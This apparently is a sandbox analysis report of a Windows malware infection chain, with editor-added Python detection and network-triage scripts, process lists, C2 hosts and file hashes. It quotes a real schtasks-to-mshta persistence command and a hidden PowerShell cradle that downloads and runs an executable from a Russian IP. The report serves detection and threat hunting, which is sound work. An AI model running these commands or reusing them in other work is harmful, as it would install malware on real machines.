C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 208

C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 840

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1040

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

"C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
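
The Processes section shows the persistence and download chain in full: faeba77a20.exe runs cmd /c schtasks to register a task that re-launches mshta on an .hta in Temp every 25 minutes, mshta spawns a hidden PowerShell, and PowerShell pulls http://176.113.115.7/mine/random.exe with WebClient.DownloadFile and runs it. Note the cradle's `$env:temp+'FH0Q…'` omits the path separator, which is why the downloaded file shows up as `C:\Users\Admin\AppData\Local\TempFH0Q…EXE` rather than inside Temp; a hunt that only lists %TEMP% would miss it. The detector below is an added example (editor's rules over constructed process-creation events, not the sandbox's signatures). The command lines and PIDs 2536/672/1944/2344/396 are taken from this report; PIDs 9001/9002 for the second task and the benign control task are made up.

```python
"""Flag the schtasks -> mshta -> PowerShell download chain in process-creation
events. Added example with the editor's own rules; not the sandbox's signatures."""
import re

USER_WRITABLE = ("\\users\\", "\\programdata\\", "c:\\temp\\")
DOWNLOAD_APIS = ("downloadfile", "downloadstring", "invoke-webrequest", "start-bitstransfer")
EXEC_HINTS = ("start-process", "invoke-expression", "iex ", "iex(")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

# Constructed events. Command lines and PIDs 2536/672/1944/2344/396 come from
# the report; PIDs 9001/9002 and the benign control (4000/5000) are made up.
EVENTS = [
    {"pid": 2536, "ppid": 1028, "image": r"C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe"'},
    {"pid": 672, "ppid": 2536, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f'},
    {"pid": 1944, "ppid": 672, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f'},
    {"pid": 2344, "ppid": 2536, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r"mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta"},
    {"pid": 396, "ppid": 2344, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''},
    {"pid": 9001, "ppid": 9000, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'schtasks /create /tn "lac5Tmaqt6v" /tr "mshta \"C:\Temp\0KxobPjd7.hta\"" /sc minute /mo 25 /ru "Admin" /f'},
    {"pid": 9002, "ppid": 9000, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r'mshta "C:\Temp\0KxobPjd7.hta"'},
    {"pid": 5000, "ppid": 4000, "image": r"C:\Windows\System32\schtasks.exe",  # benign control, hypothetical
     "cmd": r'schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup\backup.exe" /sc daily /ru SYSTEM /f'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_schtasks_mshta(ev):
    """Task creation whose action runs mshta on an .hta in a user-writable path."""
    cmd = ev["cmd"]
    if basename(ev["image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return None
    m = re.search(r'/tr\s+"(.*?)"(?:\s+/|$)', cmd, re.I)  # the /tr action, outer quotes stripped
    action = (m.group(1) if m else cmd).lower()
    if "mshta" in action and ".hta" in action and any(d in action for d in USER_WRITABLE):
        return "high", "schtasks persistence via mshta HTA", action
    return None


def rule_mshta_hta(ev):
    """mshta itself running an .hta from a user-writable path."""
    cmd = ev["cmd"].lower()
    if basename(ev["image"]) == "mshta.exe" and ".hta" in cmd and any(d in cmd for d in USER_WRITABLE):
        return "medium", "mshta executing HTA from user-writable path", cmd
    return None


def rule_mshta_child(ev, parent):
    """Script host spawned by mshta (the HTA is only a launcher)."""
    if parent and basename(parent["image"]) == "mshta.exe" and basename(ev["image"]) in SCRIPT_HOSTS:
        return "high", "mshta spawned script host", basename(ev["image"])
    return None


def rule_ps_cradle(ev):
    """PowerShell that downloads and then executes; a hidden window raises severity."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = ev["cmd"].lower()
    if any(a in cmd for a in DOWNLOAD_APIS) and any(h in cmd for h in EXEC_HINTS):
        sev = "critical" if "-windowstyle hidden" in cmd else "high"
        return sev, "PowerShell download-and-execute cradle", ", ".join(URL_RE.findall(ev["cmd"]))
    return None


def scan(events):
    """Run every rule over every event; returns a list of finding dicts."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        for hit in (rule_schtasks_mshta(ev), rule_mshta_hta(ev),
                    rule_mshta_child(ev, parent), rule_ps_cradle(ev)):
            if hit:
                sev, rule, detail = hit
                findings.append({"pid": ev["pid"], "severity": sev, "rule": rule, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['rule']}: {f['detail']}")
```

The schtasks rule parses the /tr action rather than grepping the whole command line so that the nested-quote form used by the second task (`/tr "mshta \"C:\Temp\0KxobPjd7.hta\""`) is handled, and the cmd.exe wrapper (`cmd /c schtasks ...`) is deliberately not flagged on its own: the schtasks.exe child carries the same command line and is the cleaner anchor for an alert.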

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.179.246:443 explorebieology.run tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
RU 185.215.113.97:80 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.179.246:443 explorebieology.run tcp
RU 185.215.113.97:80 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
DE 5.75.210.149:443 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4645 towerbingobongoboom.com tcp
US 8.8.8.8:53 gmgrn.ai udp
NL 159.223.209.104:443 gmgrn.ai tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.198:80 r11.o.lencr.org tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
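
The Network table mixes DNS lookups, plain-HTTP connections straight to IP addresses, connections on non-standard ports (213.209.150.137:4000 and :4645), and legitimate infrastructure the payloads borrow (GitHub releases, the Let's Encrypt OCSP responder, Telegram and Steam profile pages). Rows whose Domain column is empty have only three fields. The script below is an added example (editor's code, not sandbox output) that parses a subset of the rows copied from the table and tags each host for triage; the allow-list of public services and the dead-drop list are the editor's assumptions.

```python
"""Turn the report's Network table into a triaged host list.
Added example; the tags and lists are the editor's assumptions, not sandbox output."""

# Assumption: CDN/OCSP endpoints any Windows host may legitimately contact.
PUBLIC_SERVICES = {"github.com", "objects.githubusercontent.com", "r11.o.lencr.org"}
# Public platforms that stealers use as dead-drop resolvers for their real C2;
# tagged for investigation, never allow-listed.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}

# Subset of rows copied from the Network table above (header kept on purpose).
SAMPLE_ROWS = """\
Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.179.246:443 explorebieology.run tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
RU 185.215.113.97:80 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4645 towerbingobongoboom.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.198:80 r11.o.lencr.org tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
"""


def parse_rows(text):
    """Split rows into DNS lookups {domain: resolver_ip} and connections.
    Rows with an empty Domain column have only three fields."""
    conns, dns = [], {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            continue
        if ":" not in dest:
            continue  # header line
        ip, port = dest.rsplit(":", 1)
        port = int(port)
        if port == 53 and proto == "udp":
            dns.setdefault(domain, ip)
        else:
            conns.append({"country": country, "ip": ip, "port": port,
                          "domain": domain, "proto": proto})
    return conns, dns


def triage(conns, dns):
    """Group connections per host and tag them; also list domains that were
    resolved but never connected to, worth checking as a possible fallback list."""
    hosts = {}
    for c in conns:
        key = c["domain"] or c["ip"]
        h = hosts.setdefault(key, {"ips": set(), "ports": set(), "tags": set()})
        h["ips"].add(c["ip"])
        h["ports"].add(c["port"])
        if c["domain"] is None or c["domain"] == c["ip"]:
            h["tags"].add("direct-ip")
        if c["port"] not in (80, 443):
            h["tags"].add("nonstandard-port")
        if key in PUBLIC_SERVICES:
            h["tags"].add("public-service")
        elif key in DEAD_DROP_HOSTS:
            h["tags"].add("dead-drop-candidate")
        elif "direct-ip" in h["tags"] and c["port"] == 80:
            h["tags"].add("plain-http-c2")
    queried_only = sorted(d for d in dns if d and d not in hosts)
    return hosts, queried_only


if __name__ == "__main__":
    hosts, queried_only = triage(*parse_rows(SAMPLE_ROWS))
    for name, h in hosts.items():
        print(f"{name:35} {sorted(h['ips'])} ports={sorted(h['ports'])} {sorted(h['tags'])}")
    print("resolved but never contacted:", queried_only)
```

Blocking only the tagged direct-IP and non-standard-port hosts is the quick win; the public-service and dead-drop hosts cannot be blocked outright, so they are the ones to pivot on (which GitHub release asset was fetched, which Telegram or Steam profile was read) rather than to list as indicators.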

Files

memory/1964-0-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1964-1-0x0000000077E10000-0x0000000077E12000-memory.dmp

memory/1964-2-0x0000000001331000-0x000000000135F000-memory.dmp

memory/1964-3-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1964-5-0x0000000001330000-0x00000000017EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 fbd20cabacee9b0def4ea7c0c7340405
SHA1 f43864031c537e45ed653c82dd3e8aef4fcf32a9
SHA256 fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
SHA512 ceb4cb9fa7cf211f495e477ecb896852bba32bb230f825cfb0188733b80b12482d5ead72eea25ace0e032481547a6d8461c149539effde77c2cc8fa859629495

memory/1964-10-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1028-17-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1964-15-0x0000000001330000-0x00000000017EC000-memory.dmp

memory/1028-18-0x0000000000DE1000-0x0000000000E0F000-memory.dmp

memory/1028-19-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-21-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-22-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-23-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-24-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-25-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/1028-42-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/2748-44-0x000000013F240000-0x000000013F2DF000-memory.dmp

memory/1028-41-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/1028-40-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1180-52-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/2748-51-0x000000013F240000-0x000000013F2DF000-memory.dmp

memory/1180-47-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/1180-45-0x0000000002EE0000-0x0000000002F85000-memory.dmp

memory/1028-54-0x00000000056A0000-0x000000000573F000-memory.dmp

memory/1028-53-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-55-0x00000000056A0000-0x000000000573F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

memory/1028-71-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

MD5 f53198e8b444658cf7134f5ccb466a98
SHA1 0283e56ed7201eecfc7dad30cc6f3f30d677be66
SHA256 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107
SHA512 ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09

memory/1976-112-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1012-111-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1012-110-0x00000000044B0000-0x00000000048D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/1028-120-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1028-136-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1028-135-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1956-130-0x0000000000390000-0x00000000003F5000-memory.dmp

memory/872-137-0x0000000000FD0000-0x00000000016BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

MD5 22892b8303fa56f4b584a04c09d508d8
SHA1 e1d65daaf338663006014f7d86eea5aebf142134
SHA256 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

memory/1976-161-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1012-160-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1012-159-0x00000000044B0000-0x00000000048D3000-memory.dmp

memory/1976-167-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-168-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/872-175-0x0000000000FD0000-0x00000000016BE000-memory.dmp

memory/1028-174-0x00000000068D0000-0x0000000006FBE000-memory.dmp

memory/1028-173-0x00000000068D0000-0x0000000006FBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe

MD5 d3f6417157848636b4ce0ee7d1c4db22
SHA1 413031d39ae68a0f838fb19ca90b126b17bc6cae
SHA256 5da6cfd7a904824943ea08f5945f68fc4e8b882d973b48efffd976c3361a3638
SHA512 781b65e94e004fc798494550462aecafc57f0cf70943f5e0bbd33706a27f4325e00bf9f0ef3de9b447fa4a5cb3f533f1ee053974589614698003d6bb37af4fad

memory/1968-194-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta

MD5 1a2bf8ed4b6d5c09887ef06f8450515a
SHA1 d4a873924fb314a6338af97d8b27c9f2eea60d29
SHA256 031e82d4a4f991883a96338a71525e55dc59e3a1612dcb6037b288530e8242f2
SHA512 91d8e66f01cc1645c411633653799c0ef6c8d8504a8888aa9c4072468fec659ab2c185c059ac4d5bc72231187cd154535301cd150f26d06c42b698fa57800b24

C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/1976-218-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-239-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Windows\Tasks\Test Task17.job

MD5 9c2b9bb568984fdf53b3fd73b085decb
SHA1 55f4322f8724e80e3ec9dcba3f210c7408ffe325
SHA256 a28c81d263b90d206047cafabc22bb83f24e2afed401f47a38daf22bc755db0d
SHA512 816107fd9c862a46918c0ddf9f76e4a3fdb57d52b1fe53acde5d76487a8ee178a987d2b2d4793b706794150bc50f79c6eba78f0f8ed5e6eae4c8b539baea043b

C:\Users\Admin\AppData\Local\Temp\TarAAC7.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b8cae2557ae6ef7784cb010d3ea61b6e
SHA1 92f14d315ccac7bb363a1de0f64c37dc09e09d2b
SHA256 75c2adda116afa77ad39605b8719e12fced4fb66892a08e4184f47437cc07859
SHA512 08ea7f0e503c798a484159e660c096173d2b815f3d1ac771eb7b42100c239d341f333eca213fd2ce7b60c557e1cb820e7cac5269246efa61cf8b6957f84885e7

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Temp\0KxobPjd7.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/1968-296-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE

MD5 17de498486ab8389b310d0ea6b5ffe33
SHA1 e01dc56faffd68ab1d6675ff7c82c5fc1349fafb
SHA256 e465b0d4b8f9d028e868558a8c232ac440e7812b1aa4530ad373d05aa149f3e1
SHA512 7daa8eb5ae9265c7530f0688ad4f617727921db34b4e7afff0b3b6ed32a119fa0f0ab5b287fabe2455fd17467689ffaf23fb9772d9dc1e7205fb518c273798e5

memory/2524-308-0x0000000000F80000-0x0000000001443000-memory.dmp

memory/396-307-0x00000000064B0000-0x0000000006973000-memory.dmp

memory/2524-310-0x0000000000F80000-0x0000000001443000-memory.dmp

memory/396-306-0x00000000064B0000-0x0000000006973000-memory.dmp

memory/1976-371-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-372-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1044-381-0x0000000006580000-0x0000000006A43000-memory.dmp

memory/1044-382-0x0000000006580000-0x0000000006A43000-memory.dmp

memory/2388-384-0x00000000011F0000-0x00000000016B3000-memory.dmp

memory/2388-386-0x00000000011F0000-0x00000000016B3000-memory.dmp

memory/1968-387-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe

MD5 eff9e9d84badf4b9d4c73155d743b756
SHA1 fd0ad0c927617a3f7b7e1df2f5726259034586af
SHA256 d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad
SHA512 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

\Windows\Temp\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\Quadrisyllable.dll

MD5 a1e561bc201a14277dfc3bf20d1a6cd7
SHA1 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29
SHA256 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c
SHA512 aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

C:\Windows\Temp\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

MD5 1f166f5c76eb155d44dd1bf160f37a6a
SHA1 cd6f7aa931d3193023f2e23a1f2716516ca3708c
SHA256 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588
SHA512 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

memory/1976-430-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-443-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-445-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/1336-455-0x0000000010000000-0x00000000100E1000-memory.dmp

memory/1336-454-0x0000000000400000-0x0000000000D48000-memory.dmp

memory/1976-456-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-458-0x0000000000DE0000-0x000000000129C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/1780-460-0x0000000000180000-0x00000000001E5000-memory.dmp

memory/1932-476-0x0000000000AC0000-0x0000000000B20000-memory.dmp

memory/1264-495-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-494-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1264-496-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-492-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-490-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-486-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1512-497-0x000000013FF80000-0x000000014012E000-memory.dmp

memory/1264-484-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-482-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-480-0x0000000000400000-0x0000000000429000-memory.dmp

